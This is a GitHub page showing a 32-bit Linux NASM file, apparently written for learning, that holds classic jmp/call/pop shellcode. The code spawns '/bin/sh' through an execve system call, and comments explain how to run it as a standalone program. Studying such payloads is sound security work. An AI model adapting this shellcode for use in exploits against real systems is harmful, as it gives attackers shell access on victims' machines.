-
Notifications
You must be signed in to change notification settings - Fork 1
/
shellcode.asm
38 lines (28 loc) · 976 Bytes
/
shellcode.asm
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
; For some reason I cannot make .text section both exec and writable.
; So instead of fighting with ld and nasm I decided to use my own section '.shcode'
; Linux allows _start symbol to be contained in any executable section.
; So this program runs without problems on 32-bit Linux.
; You can run shellcode as a standalone program.
; This is only possible because memory for ELF sections is allocated
; in full pages e.g. 4kB. Otherwise writing data to memory
; beyond db '/bin/sh' would result in a segmentation fault.
section .shcode progbits alloc exec write
global _start
_start:
jmp short _sh_last
_sh_start:
pop esi
mov dword [esi+0x8], esi
mov byte [esi+0x7], 0x0
mov dword [esi+0xc], 0x0
mov eax, 0xb ; execve(filename, argv, envp)
mov ebx, esi
lea ecx, [esi+0x8]
lea edx, [esi+0xc]
int 0x80
mov eax, 0x1 ; exit(0)
mov ebx, 0x0
int 0x80
_sh_last:
call _sh_start
db '/bin/sh' ; esi will point here